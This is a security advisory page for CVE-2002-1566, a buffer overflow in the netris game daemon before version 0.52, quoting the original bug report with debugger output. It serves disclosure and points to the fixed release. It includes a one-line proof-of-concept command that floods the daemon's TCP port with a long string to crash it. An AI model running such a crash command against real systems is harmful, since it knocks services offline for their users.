Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Game)  >   netris Vendors:   Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
SecurityTracker URL:
CVE Reference:   CVE-2002-1566   (Links to External Site)
Date:  Aug 21 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 0.52
Description:   A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284

Impact:   A remote user can cause the netris daemon to crash.
Solution:   The vendor has released a fixed version (0.52), available at:

Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  netris-0.5.

Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
Content-Transfer-Encoding: 8bit            


i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...

on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/

exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *

Content-Type: application/pgp-signature
Content-Disposition: inline

Version: GnuPG v1.0.7 (FreeBSD)




Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC